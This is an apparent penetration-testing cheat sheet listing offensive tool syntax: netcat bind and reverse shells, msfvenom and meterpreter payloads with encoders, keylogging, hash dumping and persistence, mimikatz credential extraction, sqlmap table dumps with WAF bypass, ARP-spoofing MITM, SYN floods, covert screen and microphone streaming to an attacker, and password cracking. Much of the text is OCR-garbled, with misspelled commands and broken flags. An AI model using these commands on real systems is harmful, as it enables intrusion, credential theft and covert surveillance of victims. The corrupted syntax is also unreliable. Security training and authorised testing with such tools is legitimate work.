Comment on page

Tool Syntax

How to use the tools

Nmap command

Scanning methods

Switch Explanation
Scan with ping
Scanning with syn
Scanning with connection
Scanning with udp
Scanning with protocol
Scanning along with versions
Scanning with traceroute
-T4 Setting the scanning speed between 0 and 5
Scanning output with all formats
-iL list.txt
Scan the contents of the list


Switch Explanation
-ox file
Write inside the xml file
-oG file
Writing inside the grep file
-oA file
Storage with 3 formats
-iL file
Reading hosts from inside my file
-exclude file file
Except for the hosts in the file

Advanced features

Switch Explanation
-sV -p –script=banner
Draw a route map
ttl code

Firewall evasion

Switch Explanation
Crossed fasteners
-s ip
source spoof
-g #
spoof source port
-D ip , ip
–mtu #
Setting the MTU size
–spoof-mac mac
spoof mac address
–data-length size
–scan-delay script
Determining the minimum number of requests sent per second

Convert xml output to html

xsltproc nmap.xml -o nmap.html

Create active hosts

nmap -sP -n -oX out.xml | grep "Nmap" | cut -d " " -f
5 live hosts.txt

Compare nmap results

ndiff scanl.xml scan2.xml

reverse dns lookup in ip range

nmap -R -sL -dns-server server

ids test (xmas scan with ips bait and spoofing)

for x in {1 .. lOOOO .. 1);do nmap -T5 -sX -S spoof-source-IP -D
comma-separated with no spaces list of decoy IPs --spoof-mac aa:bb:cc:dd:ee:ff
-e eth0 -Pn targeted-IP. Done

List of nmap scripts

List of shared routes smb-enum-shares.nse

Wireshark software

Filter Explanation
Password RIP
ip.addr/ip.dst/ip.src (ipv6.)
TCP ports
tcp.flags (ack,fin,push,reset,syn,urg)
TCP flags
UDP ports
Basic authentication authentication
Authentication of HTTP authentication
HTTP data
HTTP cookies
HTTP referrer path
HTTP servers
http.user agent
The user-agent section in HTTP
wlan.fc.type eq 0
802.11 management frame
wlan.fc.type eq 1
802.11 control frame
wlan.fc.type eq 0
802.11 data frames
wlan.fc.type subtype eq 0 (1=reponse)
802.11 association request
wlan.fc.type_subtype eq 2 (3=response)
802.11 reassociation req
wlan.fc.type_subtype eq 4 (5=response)
802.11 probe request
wlan.fc.type_subtype eq 8
802.11 beacon
wlan.fc.type subtype eq 10
802.11 disassociate
wlan.fc.type=subtype eq 11 (12=deauthenticate)
802.11 authentication

Command operators

eq OR ==
ne OR !=
gt OR
Lt. OR
ge OR =
le OR =

Logical operators

and OR &&
or OR ||
xor OR ^^
not OR!

Netcat command


Connect to [TargetiP] Listener on [port]:
$ nc [Target P] [port]
Start Listener:
$ nc -1 -p [port]

Start HTTP SOCKS server at Automation-Server

./ncat - l 3128 -proxy -type http &

Scan ports

TCP Port Scanner in port range [startPort] to [endPort]:
$ nc -v -n -z -wl [TargetiP] [startPort]-[endPort]

transfer files

send file
nc.exe < "file.log"
download file
nc -vnlp 1234 > file.txt
Grab a [filename] from a Listener:
1. Start Listener to push [filename]
$ nc -1 -p [port] [filename]
2. Connect to [TargetiP] and Retrieve [filename]
$ nc -w3 [TargetiP] [port] [filename]
Push a [filename] to Listener:
1. Start Listener to pull [filename]
$ nc -1 -p [port] [filename]
2. Connect to [TargetiP] and push [filename]
$nc -w3 [TargetiP] [port] [filename]

Backdoor shells

Linux Shell:
$ nc -1 -p [port] -e /bin/bash
Linux Reverse Shell:
$ nc [LocaliP] [port] -e /bin/bash
Windows Shell:
$ nc -1 -p [port] -e cmd.exe
Windows Reverse Shell:
$ nc [LocaliP] [port] -e cmd.exe

Use VLC for streaming

Use cvlc \(command line VLC\) on target to migrate popups

Saving and streaming the screen through the udp protocol to the attacker’s address and port 1234

# Start a listener on the attacker machine
vlc udp://@:1234
-- OR --
# Start a listener that stores the stream in a file.
vlc udp://@:1234 :sout=#transcode{vcodec=h264,vb=O,scale=O,acodec=mp4a,
ab=128,channels=2,samplerate=44100):file{dst=test.mp4) :no-sout-rtp-sap
:no-shout-standard-sap :ttl=1 :shout-keep
# This may make the users screen flash. Lower frame rates delay the video.
vlc screen:// :screen-fps=25 :screen-caching=100
plerate=44100):udp{dst=attackerip :1234) :no-sout-rtp-sap :no-soutstandard-
sap :ttl=1 :sout-keep

Save and stream the screen in http protocol

# Start a listener on the attacker machine
-- OR --
# Start a listener that stores the stream to a file
vlc -sout=#
# Start streaming on the target machine
vlc screen:// :screen-fps=25 :screen-caching=100
plerate=44100):http{mux=ffmpeg{mux=flv),dst=:8080/) :no-sout-rtp-sap :nosout-
standard-sap :ttl=1 :sout-keep

Save and stream on broadcast

# Start a listener on attacker machine for multicast
vlc udp://@ multicastaddr :1234
# Broadcast stream to a multicast address
vlc screen:// :screen-fps=25 :screen-caching=100
plerate=44100):udp{dst= multicastaddr :1234) :no-sout-rtp-sap :no-soutstandard-
sap :ttl=1 :sout-keep

Save and record the screen in a file

vlc screen:// :screen-fps=25 :screen-caching=100
plerate=44100):file{dst=C:\\Program Files (x86)\\VideoLAN\\VLC\\test.mp4)
:no-sout-rtp-sap :no-sout-standard-sap :ttl=1 :sout-keep

Record and stream microphone on udp

vlc dshow:// :dshow-vdev="None" :dshow-adev="Your Audio Device"

SSH command

/etc/ssh/ssh known hosts #System-wide known hosts
-/.ssh/known_hosts #Hosts user has logged into
sshd-generate #Generate SSH keys (DSA/RSA)
ssh keygen -t dsa -f /etc/ssh/ssh_host_dsa_key #Generate SSH DSA keys
ssh keygen -t rsa -f /etc/ssh/ssh_host_rsa_key #Generate SSH RSA keys
If already in ssh session, press SHIFT -C to configure tunnel
Port forwarding must be allowed on the target
/etc/ssh/sshd_config - AllowTcpForwarding YES

Connect with ssh with specific port

ssh [email protected] -p 8222

Reverse port forwarding using the tunnel (in the support user reverse shell)

ssh -R 4446: [email protected]
http 4446

Set x11 victim to attacker

vi -/.ssh/config- Ensure 'ForwardXll yes'

Create port forward on port 8080 and transfer to port 443 of the attacker

ssh -R8080:12-.0.0.1:443 [email protected].

Using port forward on the attacker’s port 8080 and transferring information using ssh tunnel and port 3300

ssh -18080: [email protected]

Dynamic tunnel using proxychain. Also, the file /etc/proxychain.conf to set the port (1080)

In a separate terminal run:
proxychains nmap -sT -p80,443

Create multi-hop ssh tunnel

ssh -L 8888: 50mctf@MY_VPS
ssh -v -o PubkeyAuthentication=no -o PreferredAuthentications=password -o GatewayPorts=yes -fN -R *:8444: 50mctf@MY_VPS

Metasploit software

msfconsole r file.rc
Load resource file
msfcli | grep exploit/window
List of Windows exploits
rnsfencode -l
list of encodes
msfpayload -h
List of payloads
show exploits
Display exploits
show auxiliary
show auxiliary module
show payloads
Show payloads
search string
Search for a specific string
search exploit string
Search exploits
searchsploit -m exploits/php/webapps/
Copy the Xploit file in the current path
info module
Display module information
use module
Load Xploit or Module
show options
Display module properties
show advanced
Show advanced settings
set option value
Set value
sessions -v
List of meetings: -k # (delete) -u # (Update Meterpreter)
sessions -s script
Run the Meterpreter script in all sessions
jobs -l
List all jobs (-k # - kill)
exploit -j
Run exploit as job
route add ip nmask sid
Rotation or Pivoting
loadpath /home/modules
Load tradeparty tree
shell ruby implementation
connect -s ip 443
connect to ssl (NC clone)
route add ip mask session id
added route ·in the pivot
exploit/multi/handler - set ExitOnSession False
Show more settings
set ConsoleLogging true (also
Enable reporting

Sqlmap command

Send request Get -u "http://url?id=1&str=val"

Send Post request -u "http://url" --data="id=1&str=val"

SQL injection in a specific parameter and knowing the type of database -u "http://url" --data="id=l&str=val" -p "id"
-b --dbms="mssqllmysqlloraclelpostgres"

SQL injection on the page requiring authentication

1. Login and note cookie value (cookie1=val1, cookie2=val2) -u "http:// url "--data="id=l&str=val" -p "id"

SQL injection and getting the database version and its name and user

./ -u "http://url" --data="id=1&str=val" -p "id" -b --current-db

SQL injection and get database tables db=testdb -u "http://url" --data="id=1&str=val" -p "id" --tables -D

SQL injection and receiving table columns -u "http://url" --data="id=l&str=val" -p "id" --columns -T

Read from file -r req.txt

Get the records of the specified table from the specified database

sqlmap -r req -D openemr -T users_secure --dump

Using the delay technique

sqlmap -r req --technique=T
more info

Bypass waf with unicode

sqlmap -r json --tamper=charunicodeescape --dump --level=5 --risk=3 --dbs --columns


Creating meterpreter payload (for Linux: -t file -o callback)

./msfpayload windows/meterpreter/reverse tcp LHOST=ip LPORT=port R |
./msfencode -t exe -o callback.exe -e x86/shikata_ga nai -c 5

Create payload with bound meterpreter

./msfpayload windows/meterpreter/bind_tcp RP.OST=ip LPORT=port X

Creating a Java reverse shell

msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT=9999 -f WAR > exploit.war

Creating a reverse shell for Windows with msfvenom

msfvenom -p windows/shell_reverse_tcp lhost=ip lport=port -f exe --platform windows >reverse.exe

Generate encoded payload using msfvenom

./msfvenorn --payload windows/meterpreter/reverse~tcp --format exe
template calc.exe -k --encoder x86/shikata_ga_nai -i 5 LHOST=
LPORT=443 callback.exe

Start database msf (bt5=mysql,kali=postgresql)

/etc/rc.d/rc.mysqld start
msf db_create root:pass@localhost/metasploit
msf load db mysql
msf db connect root:pass@localhost/metasploit
msf db=import nmap.xml
--- Kali ---
# service postgresql start
# service metasploit start

return the shell (by default it will run notepad and injection)

msf use post/windows/manage/multi meterpreter inject
msf set IPLIST attack ip
msf set LPORT callback port
msf set PIDLIST PID to inject, default creates new notepad
msf set PAYLOAD windows/meterpreter/reverse_tcp
msf set SESSION meterpreter session ID

Display the html banner in the internal network

msf route add ip/range netmask meterpreter ID
msf use post/multi/gather/ping sweep # Set options and run
msf use /auxiliary/scanner/portscan/tcp # Set options and run
msf hosts-u-S x.x.x -R #Searches for x.x.x.' and sets
msf use auxiliary/scanner/http/http version # Set options and run
msf services -v -p 80-S x.x.x -R - #Displays IPs x.x.x.' with port
#80 open


List of available commands
Display system information
p.s List of processes
List of available PID
upload file C:\Program Files\
Upload file
download file
Get the file
reg command
Interaction with the registry
Back to main user
Transfer to interactive shell
migrate PID
Change to another PID
The current process behind the background
keys can (start|stop|dump)
Start/stop/delete keylogger
execute -f cmd.exe -i
Run cmd.exe and interact with it
execute -f crnd.exe -i -H -t
Run cmd.exe as a hidden process and get all the tokens
has dump
Get all local hashes
run script
Running the script (/scripts/meterpreter)
port fwd [add I delete] -lL 443 -r -p 3389
Create port forward on port 3389 in the current session and remote desktop access on port 443

Increasing access level

use priv

Impersonation token (removing the token will stop impersonation)

use incognito
list tokens -u
impersonate token domain\\user

Using nmap in meterpreter socks proxy

1. msf sessions #Note Meterpreter ID
2. msf route add id
3. msf use auxiliary/server/socks4a
4. msf run
5. Open a new shell and edit /etc/proxychains.conf
i. #proxy_dns
ii. #socks4 9050
iii. socks4 1080
6. Save and close the conf file
7. proxychains nmap -sT -Pn -p80,:35,s45
meterprete irb

Creating a stable Windows service

msf use post/windows/manage/persistence
msf set LHOST attack ip
msf set LPORT callback port
msf set REXENAHE filename
msf set SESSION meterpreter session id
meterpreter run post/windows/gather/dumplinks

Create a new process and command tree c:\

execute -H -f cmd.exe -a '/c tree /F /A c:\ C:\temp\tree.txt'

Ettercap software

Main-In-Middle attack using filters

ettercap.exe -I iface -M arp -Tq -F file.ef MACs / IPs / Ports
MACs / IPs / Ports
#i.e.: // 80,443 // = any MAC, any IP, ports 80,443

Main-In-Middle attack on subnet with functional fitters

ettercap -T -M arp -F filter // //

Switch flood attack

ettercap -TP rand flood

Ettercap filters

Compile ettercap filters

etterfilter filter.filter -o out.ef

Example filter - remove vpn traffic and decrypt http traffic

if lip.proto == UDP && udp.dst == 500) I
kill(); }
if I ip.src == 'ip' ) (
if (tcp.dst == 80) (
if (search(, "Accept-Encoding")) (
msg("Replaced Encoding\n");

Mimikatz command

1. Upload mimikatz.exe and sekurlsa.dll to target
2. execute mirnikatz
3. mimikatz# privilege: :debug
4. mimikatz# injeet::proeess lsass.exe securlsa.dll
5. mimikatz# @getLogonPasswords
6. securlsa::minidump /users/redteam/Desktop/lsass.DMP
7. securlsa::LogonPasswords
mimikatz# sekurlsa::tickets /export
mimikatz# kerberos::ptt <TICKET PATH>
#cleartext password and hash
.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "token::elevate" "lsadump::secrets" "exit"

Hping command3

hping3 targetiP --flood --frag --spoof ip --destport # --syn

Arping command

./arping -I eth# -a # arps

Wine command

ed /root/.wine/drive e/HinGW/bin
wine gee -o file.exe /tmp/ eode.e
wine file.exe

Grub software

GRUB Henu: Add 'single' end of kernel line. Reboot. Change root password. reboot

Hydra command

hydra -1 ftp -P words -v targetiP ftp

hashcat software

NTLMv2 crack

hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt --force

John the ripper software

Crack with word list

$ ./john -wordfile:pw.lst -format: format hash.txt

Sample formats

$ john --format~des username:SDbsuge8iC58A
$ john --format~lm username:$L~$a9c604d244c4e99d
$ john --format~md5 $1$12345678$aiccj83HRD8o6ux1bVx7D1
$ john --format~raw-sha1 A9993E364706816A8A3E25717850C26C9CDOD89D
# For --format~netlmv2 replace $NETLM with $NETLMv2
$ john --format~netlm
# Exactly 36 spaces between USER and HASH (SAP8 and SAPG)
$ john --format~sapb
ROOT $8366A4E9E68"2C80
username:ROOT $8366A4E9E68"2C80
$ john --format=sapg
ROOT $1194E38F1489F3F8DA18181F14DE8"0E"8DCC239
$ john --format=sha1-gen
$ john --format=zip

List of passwords

Creating different words based on one word

#Add lower(@), upper(,), ~umber(%), and symbol(^) I to the end of the word
crunch 12 12 -t baseword@,%^ wordlist.txt
Use custom special character set and add 2 numbers then special character
maskprocessor -custom-charset1=\!\@\#\$ baseword?d?d?l wordlist.txt
generate wordlist from website with number
cewl -d 5 -m 3 -w wordlist http://fuse.fabricorp.local/papercut/logs/html/index.htm --with-numbers

Vsown command

1. Download:
2. Create a new Shadow Copj
a. cscript vssown.vbs /start (optional)
b. cscript vsown.vbs /create
3. Pull the following files frorr. a shadow copj:
a. Copy
b. copj
C. COpj
4. Copj files to attack box.
5. Download tools:
6. Configure and Make source code for libesedb from the extracted package
a. cd libesdb
b. chmod +x configure
c. ./configure && make
Use esedbdumphash to extract the data table from ntds.dit.
a. cd esedbtools
b. . I esedbdumphash ../../ntds.dit

File hash

Hash length

MD5 16 bytes
SHA-1 20 bytes
SHA-256 32 bytes
SHA-512 64 bytes

Software with different hash databases
# dig +short md5 TXT
Result = "filename I source" i.e. "cmd.exe I NIST"

Malware hash database
# dig +short [MD5|SHA-1] TXT
Result = last seen timestamp AV detection rate
Convert timestamp= perl-e 'print scalar localtime( timestamp ), "\n"'

Search in metadata files

Search the virustotal database

Guess the password of the zip file

fcrackzip -v -D -u -p /usr/share/wordlists/rockyou.txt

Guess the password of the winrm service

crackmapexec winrm <IPS> -u <USERS> -p <PASSWORDS>

Guess the password of the smb service

crackmapexec smb <IP> -u <USER> -p <PASS> --shares

Connect to mssql with impackt -port 1433 [email protected]

powershell download files

powershell iwr -usebasicparsing -OutFile mimikatz.exe

List of Pods

𝑘𝑢𝑏𝑒𝑐𝑡𝑙 𝑔𝑒𝑡 𝑝𝑜𝑑

Check if you have rights to exec into any pods

./𝑘𝑢𝑏𝑒𝑐𝑡𝑙 𝑎𝑢𝑡ℎ 𝑐𝑎𝑛 − 𝑖 𝑒𝑥𝑒𝑐 𝑝𝑜𝑑𝑠

exec into sensitive-pod

./𝑘𝑢𝑏𝑒𝑐𝑡𝑙 𝑒𝑥𝑒𝑐 − 𝑖𝑡 𝑠𝑒𝑛𝑠𝑖𝑡𝑖𝑣𝑒 − 𝑝𝑜𝑑 /𝑏𝑖𝑛/𝑏𝑎𝑠ℎ

More information about the environment

kubectl get nodes -o wide


Discover Devices

python -m discovery

Scan for vulnerabilities